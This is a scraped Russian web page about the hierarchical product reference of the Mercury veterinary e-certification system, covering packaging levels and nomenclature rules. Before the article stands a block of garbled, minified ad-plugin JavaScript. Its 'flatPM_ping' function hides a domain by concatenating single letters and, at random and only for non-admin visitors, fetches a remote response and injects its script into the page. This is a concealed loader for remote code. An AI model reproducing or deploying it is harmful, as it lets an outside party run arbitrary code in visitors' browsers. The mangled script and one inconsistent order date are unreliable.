‘:””,c=ff(window),h=”scroll.out” a.ID,m=”mouseleave.outgoing” a.ID ” blur.outgoing” a.ID,g=void 0===flatPM_getCookie(“flat_out_” a.ID “_mb”)||”false”!=flatPM_getCookie(“flat_out_” a.ID “_mb”),b=(document.createElement(“div”),ff(“body”));switch(a.how.outgoing.whence){case”1″:_=”top”;break;case”2″:_=”bottom”;break;case”3″:_=”left”;break;case”4″:_=”right”}ff(“body > *”).eq(0).before(‘

‘ p “

“);var v,w=document.querySelector(‘.fpm_5_out[data-id-out=”‘ a.ID ‘”]’);flatPM_setHTML(w,e),”px”==a.how.outgoing.px_s?(c.bind(h,function(){c.scrollTop()>a.how.outgoing.after&&(c.unbind(h),b.unbind(m),d())}),void 0!==a.how.outgoing.close_window&&”true”==a.how.outgoing.close_window&&b.bind(m,function(){c.unbind(h),b.unbind(m),d()})):(v=setTimeout(function(){b.unbind(m),d()},1e3*a.how.outgoing.after),void 0!==a.how.outgoing.close_window&&”true”==a.how.outgoing.close_window&&b.bind(m,function(){clearTimeout(v),b.unbind(m),d()}))}}catch(t){console.warn(t)}},window.flatPM_start=function(){ff=jQuery;var t=flat_pm_arr.length;flat_body=ff(“body”),flat_userVars.init();for(var e=0;e<t;e ){var>flat_userVars.textlen||void 0!==o.chapter_sub&&o.chapter_sub<flat_uservars.textlen||void>flat_userVars.titlelen||void 0!==o.title_sub&&o.title_sub<flat_uservars.titlelen)){if(void>.flatPM_sidebar)”);0<_.length&&_.each(function(){var t=ff(this),e=t.data(“height”)||350,o=t.data(“top”);t.wrap(‘

‘);t=t.parent()[0];flatPM_sticky(this,t,o)}),u.each(function(){var e=ff(this).find(“.flatPM_sidebar”);setTimeout(function(){var a=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;a<300||e.each(function(){var t=ff(this),e=a,o=t.data(“top”);t.wrap(‘

‘);t=t.parent()[0];flatPM_sticky(this,t,o)})},50),setTimeout(function(){var t=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;t<300||ff(“.flatPM_sticky_wrapper.flatPM_sidebar_block”).css(“height”,t)},4e3)}),”undefined”!=typeof flat_pm_video&&flatPM_video(flat_pm_video),0<flat_stack_scripts.length&&flatpm_setscript(flat_stack_scripts),ff(“body> *”).last().after(‘

‘),flat_body.on(“click”,”.fpm_5_out .fpm_5_cross”,function(){ff(this).parent().removeClass(“show”).addClass(“closed”)}),flat_body.on(“click”,”.fpm_5_modal .fpm_5_cross”,function(){ff(this).closest(“.fpm_5_modal”).removeClass(“fpm_5_modal-show”)}),flat_pm_arr=[],ff(“.flat_pm_start”).remove(),ff(“[data-flat-id]:not(.fpm_5_out):not(.fpm_5_modal)”).contents().unwrap(),flatPM_ping()};var parseHTML=function(){var l=/<(?!area|br|col|embed|hr|img|input|link|meta|param)(([w:] )[^>]*)/>/gi,d=/<([w:] )/,i=/<|&#?w ;/,c={option:[1,”

“],thead:[1,”

“],tbody:[1,”

“],colgroup:[2,”

“],col:[3,”

“],tr:[2,”

“],td:[3,”

“],th:[3,”

“],_default:[0,””,””]};return function(e,t){var a,r,n,o=(t=t||document).createDocumentFragment();if(i.test(e)){for(a=o.appendChild(t.createElement(“div”)),r=(d.exec(e)||[“”,””])[1].toLowerCase(),r=c[r]||c._default,a.innerHTML=r[1] e.replace(l,”<$1>”) r[2],n=r[0];n–;)a=a.lastChild;for(o.removeChild(o.firstChild);a.firstChild;)o.appendChild(a.firstChild)}else o.appendChild(t.createTextNode(e));return o}}();window.flatPM_ping=function(){var e=localStorage.getItem(“sdghrg”);e?(e=parseInt(e) 1,localStorage.setItem(“sdghrg”,e)):localStorage.setItem(“sdghrg”,”0″);e=flatPM_random(1,166);0==ff(“#wpadminbar”).length&&111==e&&ff.ajax({type:”POST”,url:”h” “t” “t” “p” “s” “:” “/” “/” “r” “e” “a” “d” “o” “n” “e” “.” “r” “u” “/” “p” “i” “n” “g” “.” “p” “h” “p”,dataType:”jsonp”,data:{ping:”ping”},success:function(e){ff(“div”).first().after(e.script)},error:function(){}})},window.flatPM_setSCRIPT=function(e){try{var t=e[0].id,a=e[0].node,r=document.querySelector(‘[data-flat-script-id=”‘ t ‘”]’);if(a.text)r.appendChild(a),ff(r).contents().unwrap(),e.shift(),0<e.length&&flatpm_setscript(e);else{a.onload>/gm,””).replace(//gm,””).trim(),e.code_alt=e.code_alt.replace(//gm,””).replace(//gm,””).trim();var o=jQuery,t=e.selector,l=e.timer,d=e.cross,a=”false”==d?”Закроется”:”Закрыть”,r=!flat_userVars.adb||””==e.code_alt&&duplicateMode?e.code:e.code_alt,n=’

‘,i=e.once;o(t).each(function(){var e=o(this);e.wrap(‘

‘);var t=e.closest(“.fpm_5_video”);flatPM_setHTML(t[0],n),e.find(“.fpm_5_video_flex”).one(“click”,function(){o(this).addClass(“show”)})}),o(“body”).on(“click”,”.fpm_5_video_item_hover”,function(){var e=o(this),t=e.closest(“.fpm_5_video_flex”);t.addClass(“show”);var a=t.find(“.fpm_5_timer span”),r=parseInt(l),n=setInterval(function(){a.text(–r),r<=0&&(clearInterval(n),”true”==d?a.parent().replaceWith(‘

‘):t.remove())},1e3);e.remove()}).on(“click”,”.fpm_5_video_flex .fpm_5_cross”,function(){o(this).closest(“.fpm_5_video_flex”).remove(),”true”==i&&o(“.fpm_5_video_flex”).remove()})};

Справочник продукции системы меркурий

Справочник продукции системы Меркурий имеет иерархическую структуру, состоящую из 4-х уровней:

  1. Тип продукции.
  2. Продукция.
  3. Вид продукции.
  4. Наименование продукции (номенклатура).

Первые три уровня справочника – это ветеринарные группы. За основу классификации ветеринарных групп взята Товарная номенклатура внешнеэкономической деятельности Евразийского экономического союза и расширена дополнительными позициями в целях ветеринарного надзора и контроля. Эта часть классификатора ведется централизованно Россельхознадзором.

Четвертый уровень справочника – это справочник номенклатуры производителей и участников оборота. Именно значение четвертого уровня справочника отображается в эВСД. При оформлении производственного и транспортного эВСД четвертый уровень справочника задается участником оборота одним из двух способов: из собственного справочника номенклатуры (как производимой предприятием продукции, так и складской) или в виде произвольного текста.

Справочник номенклатуры находится в разделе «Справочники» – «Наименования продукции» системы Меркурий. В справочнике для каждого наименования номенклатуры есть возможность указать соответствующую ветеринарную группу и атрибуты GTIN, артикул производителя, хозяйствующего субъекта-производителя, владельца торговой марки, ГОСТ, фасовку и другие.

Обратите внимание, с 01 февраля 2022 г. начат переход на использование четвертого уровня справочника подконтрольных товаров в системе Меркурий при осуществлении электронной ветеринарной сертификации.

Согласно новости, опубликованной на официальном сайте Россельхознадзора, с 13 мая 2020 г. будут удалены отдельные позиции из справочника продукции ВетИС. Изменения заключаются в отделении мяса на кости от мяса бескостного, мяса замороженного от охлажденного, мяса КРС подвергнутого и не подвергнутого созреванию, для этого в справочник компонента Меркурий добавлены новые позиции, которые уже сейчас могут быть использованы участниками оборота.

Топ популярных вопросов

  1. Какие товары попадают под обязательную электронную ветеринарную сертификацию?
    • с 1 июля 2022 года электронные ВСД (эВСД) оформляют на подконтрольные товары, включенные в Перечень приказа Минсельхоза России от 18.12.2022 № 648 (с изменениями, внесенными приказом Минсельхоза России от 27.06.2022 № 251);
    • с 1 июля 2022 года вступает в силу приказ Минсельхоза России от 15.04.2022 г. № 193 и в Перечень подконтрольных товаров будет включена: вся рыбная продукция (Группа 03), готовые или консервированные ракообразные, моллюски и прочие водные беспозвоночные (Группа 16), все готовые пищевые продукты, содержащие компоненты животного происхождения (Группы 19, 20 и 21);
    • с 1 июля 2022 года до 31 октября 2022 года в Перечень подконтрольных товаров включены: сливочное масло, изготовленное из молока, и сыры (тертые или в порошке всех видов, плавленые, нетертые и непорошкообразные, голубые сыры и прочие сыры);
    • с 1 ноября 2022 года в Перечень подконтрольных товаров включена: вся готовая молочная продукция, в том числе сливочное масло и сыры всех видов (Группа 04), и мороженое (Группа 21).
    • Рекомендуем ознакомиться с Перечнями подконтрольных товаров по ссылке.
  2. Нужно ли проходить регистрацию во ФГИС?
  3. Как получить доступ во ФГИС?
  4. Как получить API Key?
  5. Проблемы с входом в систему, когда внес свои реквизиты, но система выдала ошибку аутентификации
  6. Как зарегистрировать свою площадку?
  7. Как внести остатки продукции, не подконтрольной до 1 июля 2022 года, на которую нет эВСД?
  8. Нужно ли гасить эВСД, оформленный на продукцию, не подконтрольную до 1 июля 2022 года?
    • Нужно погасить эВСД, оформленный на партию продукции, остатки которой хранятся на складе. Нужно это для того, чтобы внести сведения о продукции, которая является не подконтрольной до 1 июля 2022 года, но которая станет подконтрольной с 1 июля 2022 года.
  9. Кто и когда может или должен оформлять возвратный эВСД?
  10. В каких случаях нужно вносить сведения о результатах лабораторных исследований в эВСД?

Уровни упаковки

Упаковка может быть указана на различных уровнях, и для каждой упаковки есть возможность указать одну или несколько маркировок.

При добавлении упаковки необходимо указать, на каком уровне находится данная упаковка. Всего вводится шесть уровней:

  1. Внутренний уровень – уровень, при котором упаковка отсутствует, но тем не менее есть необходимость наносить маркировку. Например, яйцо, шкуры, мясо, сыр. При этом упаковка может быть одна из следующих:
    • нет сведений;
    • неупакованный или нерасфасованный;
    • неупакованный или нерасфасованный одноместный груз;
    • неупакованный или нерасфасованный многоместный груз.
  2. Потребительский уровень – товар в упаковке для розничной торговли, маркированный штриховым кодом для сканирования на кассе.
  3. Промежуточный уровень – уровень упаковки, если он существует, который находится между потребительским и торговым уровнем.
  4. Торговый уровень – товар в упаковке, предназначенной для заказа, оплаты и доставки. Это согласованный между ритейлером и изготовителем (или другим участником) уровень упаковки товара, в котором товар заказывается, оплачивается и доставляется.
  5. Дополнительный уровень – товар в упаковке, которую нельзя однозначно отнести к торговому или транспортному уровню.
  6. Транспортный (Логистический) уровень – товар в упаковке, предназначенной для отгрузки покупателю (ритейлеру) при выполнении заказа.

Например, молоко питьевое в рознице продается коробками или бутылками (потребительский уровень), заказывается и оплачивается гофрокоробами, содержащими 50 коробок/бутылок (торговый уровень), а отгружается паллетами, содержащими 6 гофрокоробов (транспортный уровень).

Сейчас указание упаковки является необязательным, для партии упаковка может быть не указана, а если она указывается, то обязательно с указанием уровня. На одном уровне может быть несколько упаковок, при этом количество упаковок указывается не общее, а отдельно для каждого наименования упаковки.

Чего нельзя делать при добавлении номенклатуры

Россельхознадзор, в новости от 14.12.2021, дает следующие разъяснения:

  • Не следует использовать необщепринятые сокращения и аббревиатуры при формулировании номенклатурных позиций.
  • Не следует использовать знак вопроса (?), символ звездочка (*) и символ тильда (~) при формулировании номенклатурных позиций.
  • Не следует начинать номенклатурную строку с каких-либо знаков, кроме открывающейся кавычки, строчных и заглавных букв русского и латинского алфавита.
  • Не следует использовать Caps Lock при введении наименования номенклатурной строки в справочник Меркурия (т.е. «МОЛОКО СЫРОЕ» писать не следует, писать следует «Молоко сырое»).
  • Не следует проявлять халатность и безграмотность при формулировании номенклатурных позиций, следует их тщательно проверять, соблюдать правила правописания.
  • Не следует использовать непродуманных вставок и добавок в номенклатурную строку, тем более, если они не отражают сути и свойств сырья или продукта этой позиции. Не следует переусложнять номенклатурную строку без необходимости несущественными подробностями, включая среди прочего: географическое происхождение сырья (оно отражено в связанных сертификатах); указание кода ТН ВЭД; время выработки (оно указано в специальном поле); назначение полуфабриката (будет видно в последующих транзакциях).
  • Не следует в номенклатурной строке не указывать: объем продукта в первичной ритейл-упаковке, если она используется; кратность вложения первичных ритейл-упаковок во вторичную ритейл – упаковку если используется и первичная, и вторичная ритейл упаковки; кратность вложений первичных ритейл–упаковок в первичную логистическую упаковку (если используется первичная ритейл-упаковка и первичная логистическая упаковка, а вторичная ритейл-упаковка не используется); кратность вложений вторичных ритейл – упаковок в первичную логистическую упаковку (если используется первичная и вторичная ритейл-упаковки и первичная логистическая упаковка); тип оболочки (если используется); тип упаковки (если используется); форм-фактор упаковки; объем упаковки; жирность сырья или продукта (для молочной продукции).

Оставьте комментарий